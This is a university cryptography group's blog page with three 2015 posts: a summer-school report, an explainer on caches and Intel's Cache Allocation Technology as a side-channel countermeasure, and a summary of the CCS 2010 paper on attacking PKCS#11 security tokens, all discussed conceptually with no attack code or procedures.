## Tuesday, October 27, 2015

### Sardinia eCrypt School, October 2015

As I was standing in the sweltering heat, the burning light from above with the hustle bustle of the busy bodies rushing all around me, I thought to myself "in about three hours I'll finally get through Stansted airport security".

One of the reasons I applied for a PhD at the University of Bristol was to travel; to travel all around the world attending conferences, networking with other academics in my field and collaborating on applicable pieces of work. However, I hadn't anticipated that I would arrive at Bristol and meet my supervisors (Elisabeth Oswald and Daniel Page) for them to say "thank goodness you're here, now pack your bags and head to Sardinia for a week".

I didn't argue.

The school I'm referring to is the "School on Design and Security of Cryptographic Algorithms and Devices", and this year it was co-sponsored by the International Association for Cryptologic Research (IACR). A total of roughly 80 Academics and Professionals from all around the globe attended the conference, many of whom were new PhD students (comme moi), and a few were seasoned Crypto School Veterans. As a newbie I experienced the excitement of meeting all these new faces, and getting to know them over a few glasses of wine (the magnificent hotel resort was very generous with its distribution of wine, particularly to my table).

The Summer School took the form of a crash course in all different aspects of cryptography, focusing on covering a lot of ground with introductory lectures. For my first blog post I really wanted to focus on one particular talk, but after attending them all it became clear that I had quite a few favourites; for their content, Benedikt Gierlichs "Introduction to Implementation Attacks" and Josep Balash "Introduction to Fault Attacks" were fascinating. With a background of little knowledge of practical attacks on embedded security, I was shocked to see just how easy one could manipulate theoretically secure devices, simply by making minor alterations to the embedded circuit (see slides from Benedikt Gierlich "Introduction to Implementation Attacks" for more detail).

## Thursday, October 8, 2015

### Caches: a Computer Science 101 explanation

The so-called memory wall is now and has long been a thorn in the side of computer architecture. The issue is simple: modern processors are able to execute instructions at a high rate (magnified by superscalar, SMT, multi-core and whatever else), but are effectively limited by the (relatively) low performance of memories they are attached to. The sticking plaster over this issue, which has worked fairly well so far at least, is the memory hierarchy. Again put simply, in the absence of an ideal, infinitely large and infinitely fast memory we're stuck with less ideal alternatives. So as a compromise, we try to get the best out of each technology we do have: this results in the memory hierarchy, where we have, for example, some small, fast registers at one end and a larger, slow memory at the other. As long as we retain the working set towards the faster end of the hierarchy (which the principle of locality suggests we can), performance approaches the ideal.

Somewhere in the hierarchy between registers and memory, we typically place a cache (or various levels of them). A given cache will have less capacity than main memory, but can be faster as a consequence; using control logic that transparently capitalises on locality of reference, most accesses are (in theory) satisfied by the faster cache rather than the slower memory. Or, if you just care about software, they pull off a kind of magic trick: the program executes faster, and does so "for free" in the sense the cache is transparent so the program needn't do anything special. Or at least it does on average: if can write some interesting programs to exercise the worst-case behaviour, which show the real and quite alarmingly sized gap in performance patched over by caches.

### Partitioned caches, CAT and side-channel attacks

After years of increasing cache size, and tweaking their organisation and control strategies, Intel have now included something called Cache Allocation Technology (CAT) in their Xeon model processors: there's a great write-up here, although the original white-paper doesn't really do justice to the vast range of literature in this area. The idea is that the cache can be partitioned, or divided into protected regions with the goal of improving performance. For a server delivering a service with variable demand, for example, it makes sense to allow forms of variable resource allocation to match. Given it is transparent to your programs, by design, you might not think of the cache as a resource of this type. But it is of course: processes share and so compete for space in (any level of) the cache, so by allowing protected allocation via of said space via partitioning, one can eliminate said contention. For example, the OS might decide to allocate a large(r) region to some high-priority process and a small(er) region to another process deemed lower-priority; the former might execute faster as a result, since more of its working set is resident.

This is interesting from a security perspective, because when any resource is shared between two processes, there is potential for leakage of information from one process to another. For the specific case of caches, there's again a huge amount of literature from the side-channel community, but the (fairly) recent work of Eisenbarth, Sunar et. al goes a long way toward summing up one strand of the wider problem. The good news is that wrt. the Last Level Cache (LLC), which is problematic in the sense it's a target for cross-VM type attacks in the context of cloud computing, CAT might offer a countermeasure. Depressingly (for me), this is a sort of bitter sounding "I told you so" stemming from admittedly quite speculative work I did 10 years ago. It's also depressing that was 10 years ago, but that's another story.

### Knee-jerk conclusions

I said might offer carefully though, because although Intel may have bought the idea of exposing the control of shared resources, this is down to a focus on non-security metrics such as performance. That focus seems to undermine the value of CAT for security: for example, the technical documentation says that "power management may override CAT settings". It might be hard to mount a PoC, but it at least seems feasible that an attack process might force the security unaware power management system to abandon CAT, then mount an LLC-based attack as normal.

I've only really started to look at the technical detail, so it's too soon to jump to strong conclusions, but, to me, work like Sanctum and CHERI offer more considered (albeit more invasive) approaches to isolated, compartmentalised instruction execution; in contrast, and at first glance at least, CAT seems more like another bolt-on and so a missed opportunity. Given the effort involved in deploying a technology like CAT at all, it seems a shame security is again somewhere down the metric pecking order: probably Intel could have done us all a favour by helping to solve the underlying security problem (and, to be fair, there may well be ways of using CAT to do so), but instead opted to target (more saleable) performance again.

## Monday, October 5, 2015

### Study Group: Attacking PKCS#11 Tokens

This year, the Bristol Cryptography Group is doing something slightly different with our weekly study groups. Each member of the group has been tasked with talking about "the best paper [they've] read this year".

This means that papers we're presenting won't all be particularly recent, but (hopefully) interesting and exciting bits of work.

I kicked things off last week by talking about Attacking and Fixing PKCS#11 Tokens [1], which is from CCS '10. I started my PhD just over a year ago and this was one of the first papers I read. It has stuck with me as a model of good scientific writing: the exposition is very clear, the content is cleanly presented and one doesn't need to have a huge amount of prerequisite knowledge in order to follow the methodology. More importantly, even a non-specialist reader can understand the main result of the paper and appreciate its significance.

In brief: the authors used a formal, symbolic model to analyse a number of commercial security devices implementing a standard key management API called PKCS#11. Of the 17 tokens tested, "9 were vulnerable to attack, while the other 8 had severely restricted functionality." As I said, one doesn't need to have a PhD in Cryptography in order to get the point: real security devices were seriously flawed. In fact, they allowed you to obtain secret keys in plaintext.

A security token is designed to provide access to sensitive material in insecure environments. Your company might want you to access their (sensitive) system from your (potentially insecure) house, so they give you a USB stick (or similar) to bridge the gap. The token will do cryptography for you and your personal laptop, which could be infested with malware, won't be able to directly access the secret keys stored on the token. Instead, there's an API - an interface - between your machine and the token. Moreover, the token is (supposedly) tamper-resistant, so one cannot learn the key values by breaking open the hardware.

The most popular API for security tokens is PKCS#11, which is described in a vast document that was first published in the mid '90s and has been updated very little since then. The trouble is, while the document itself is public [2], the implementation of its contents within each security token is typically unknown to all but the token's manufacturer. So, while attacks on the standard had been known for quite some time prior to the publication of this paper [3, 4], it was unclear whether these attacks could actually be mounted on real devices. Perhaps the manufacturers had been smarter than those who had written the standard and had avoided the many pitfalls by adding extra safeguards?

Of course not. Compliance trumps security every time.

The authors of the paper built a tool that reverse-engineers a token to deduce its functionality, builds a formal model to represent this functionality, finds an attack in the model and then attempts to implement this attack on the real device. While the formal model is quite sophisticated, the attacks are not. Of the five presented in the paper, three are obvious non-compliance with the standard (such as the token just handing you a secret key in plaintext if you ask for it!) and the other two are versions of the famous Wrap/Decrypt attack first found in 2003 [3]. The only tokens that were not vulnerable to these basic attacks were those that disabled key wrapping (encrypting a key under another key) altogether, but this is an important feature of key management APIs.

It is, in fact, possible to do key wrapping in a secure way, but it requires great care. There has been some research in this direction since 2010, including my own ongoing work, but I don't have space to elaborate on this here.

For me, the take-home message from this paper is that, if you don't prove the security of your security device, it's probably insecure. This insecurity makes for fun academic papers, but is also rather worrying when your device is widely used in the real world.

[1] - http://dl.acm.org/citation.cfm?doid=1866307.1866337
[2] - http://docs.oasis-open.org/pkcs11/pkcs11-base/v2.40/pkcs11-base-v2.40.pdf